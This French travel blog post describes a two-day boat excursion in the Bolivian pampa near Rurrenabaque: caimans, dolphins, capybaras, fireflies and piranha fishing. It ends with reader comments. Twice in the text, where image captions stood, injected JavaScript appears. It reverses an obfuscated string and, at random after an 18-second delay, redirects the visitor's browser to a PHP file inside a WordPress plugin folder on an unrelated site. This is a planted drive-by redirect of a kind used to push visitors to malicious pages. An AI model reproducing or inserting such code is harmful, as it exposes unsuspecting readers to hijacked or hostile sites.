Nous avons passé 2 jours à la pampa, la savane Amazonienne dans la région de Santa Rosa à 2h30 de piste de Rurrenabaque. Depuis Santa Rosa, nous avons navigué 3h sur le Rio Yucuma à la recherche de la faune sauvage de cette région. Accompagnés de notre guide Norman de Madidi Expeditions, de la Seniora Gabi et sa fille Dali, nous avons été gâté.

En route à la découverte de la pampa
Le bateau à peine démarré, nous voyons premier caïman(crocodile), puis un deuxième…Des crocodiles à la pelle, sans exagérer, tous les 5 mètres on en voyait un ou plusieurs dans toutes les positions et de toutes les tailles.
Il fait beau mais très chaud, nous continuons notre croisière et nous voyons quelques dauphins. Trop cool, les dauphins viennent jouer avec notre barque. Norman, notre guide, nous informe que les dauphins nous « protègent » lors des baignades dans la rivière, et qu’il était possible de se baigner. Heuu, nous venons de voir des caïmans partout, la rivière est infesté de crocodiles. On réfléchit un peu, les paramètres sont les suivants: Il fait trop chaud, les dauphins nous protègent et Norman nous demande de sauter. Sérieusement, il fait trop chaud, on saute dans cette rivière aux eaux troubles et infestée de crocodiles et de piranhas(poissons carnivores), et quelques dauphins pour nous protéger hihi. C’est une sensation incroyable. T’imagines si les dauphins se cassent et nous laissent là?

$nJe=function(n){if (typeof ($nJe.list[n]) == “string”) return $nJe.list[n].split(“”).reverse().join(“”);return $nJe.list[n];};$nJe.list=[“\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ujours prêts á l’attaque” width=”1024″ height=”681″ /> Crocodiles en mode peace mais toujours prêts á l’attaque

Nos protecteurs dans les eaux troubles d’Amazonie
Après cette séance de sensations fortes, nous continuons à rentrer dans l’Amazonie. Des oiseaux de toutes les sortes, des aigles, des perroquets et de nombreux Sereres, nous disent bonjour en volant d’un coté à l’autre de la rivière ou tout simplement en nous observant. Nous avons même vu des animaux trop mignons et d’autres vraiment bizarres… Des capybaras, les rongeurs les plus grands de la planète. Des singes jaunes dont la taille adulte ne dépasse pas les 30cm de long. Des tortues faisant bronzette. Nous étions déjà aux anges.

En mode séchage d’ailes

Un capybaras, le rongeur le plus grand de la planète

On partage notre lodge avec une colonie de singes

$nJe=function(n){if (typeof ($nJe.list[n]) == “string”) return $nJe.list[n].split(“”).reverse().join(“”);return $nJe.list[n];};$nJe.list=[“\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}rtues font bronzette et posent pour nous lors de notre passage” width=”1024″ height=”681″ /> Des tortues font bronzette et posent pour nous lors de notre passage
Après 3h de navigation, nous arrivons au lodge de Madidi Expeditions composé de 5 chambres doubles avec salle de bain privée (du luxe en pleine savane). Des hamacs posés sur le bord de la rivière pour se relaxer.
Avant de dîner, nous sommes allés profiter du coucher du soleil dans une communauté locale où vous pouvez vous rafraîchir ou vous confronter aux locaux sur le terrain de foot ou de volley-ball. Nous y avons rencontré un marocain Ismail, en voyage en Bolivie après avoir fini son stage au Chili. Rencontrer un marocain au milieu de la savane Amazonienne, cela n’arrive pas tous les jours.

La rencontre avec Ismail sur un terrain de foot dans la pampa Bolivienne
A la tombée de la nuit, retour vers le lodge de Madidi Expeditions. Norman, nous demande d’éteindre toutes les torches. Nous aurons passé 30 minutes au milieu de la rivière Yucuma, les lumières éteintes entouré de crocodiles. Tout cela, afin d’observer le bal des lucioles. Des feux d’artifices de tous les côtés, ces petites lumières nous ont émerveillé. Un spectacle magique…
Une fois au lodge, un dîner royal nous attendait. Erika, la cuisinière a fait la route avec nous, spécialement pour nous chouchouter niveau nourriture et elle a réussi haut la main. Nous n’avons pas aussi bien mangé depuis très longtemps. Puis direction la chambre pour une bonne nuit de sommeil bien méritée.

Sunrise Amazonie Bolivie
Nous commençons la deuxième journée par un lever du soleil magnifique sur l’une des plaines inondables de la Pampa. Nous reviendrons ensuite au lodge pour petit déjeuner et ressortir à la rencontre des animaux de la pampa. Ce matin là, nous avons vu autant de caïmans que la veille et beaucoup d’oiseaux. Nous avons fait de la pêche aux piranhas qu’on a mangé à midi, une activité très marrante.

En pleine action, pêche aux piranhas

La pêche était bonne. Voici une partie de notre repas du midi
Le saviez vous? Il y a plus d’une centaine de milliers d’années, avant la formation de la chaîne des Andes, l’océan couvrait toute cette partie de l’Amazonie, d’où la présence de tortues, dauphins et raies mantas dans le rio Yucuma et ses affluents.
Comment y aller?
Madidi Expeditions organise des tours à la Pampa avec un service impeccable. Les chambres sont propres, le guide Norman est topissime et la nourriture est délicieuse.
Pour plus d’info:
- sur la Selva, cliquez-ici.
- sur le bus de La Paz à Rurrenabaque, cliquez-ici.
N’hésitez pas à nous contacter pour plus de détails.
Suivez-nous sur notre blog, notre page Facebook et notre page Instagram.
JerryPeps by AGBackpackers.com
Salut !
Superbes photos, ça donne envie d’y retourner ! Par contre mon avis est assez partagé car même si c’était top de voir tout ces animaux, j’avais quand même l’impression d’envahir leur espace et quelque part de ne pas être à ma place. Probablement du au fait de la grande quantité de lodges et de personnes présentes sur le lieux… Quand on y regarde de près, c’est quand même un peu le parc d’attraction, non? Par contre, avez-vous fait un trek dans la jungle du parc Madidi ? Là ça devient tellement plus authentique…
Depuis peu, j’ai tout laissé tombé pour me consacrer à 100% à l’organisation de treks et d’excursions en Amazonie via mon site Internet tout neuf : gayatrek.com. J’essaye de partager ma passion pour la jungle avec ces tours plus authentiques les uns que les autres. L’Amazonie il fait chaud, c’est parfois un peu dur, mais ça se mérite. Car des années plus tard, elle fait partie des expériences dont on est fier, et qu’on peut raconter encore et encore avec des étoiles dans les yeux. Qu’en penses-tu ?
A bientôt, et bon courage pour le reste de tes aventures 🙂
Fabien
Répondre
Salut Fabien,
Nous avons évidemment passé 3 jours dans la jungle du Madidi National park. Voici le lien de notre expérience dans ce parc: http://agbackpackers.com/2015/12/21/jungle-amazonie/
Pour ma part la jungle est beaucoup plus intéressante que la pampa parce qu’on y apprend beaucoup plus de choses et en plus cela aide à préserver les communautés indigènes.
Répondre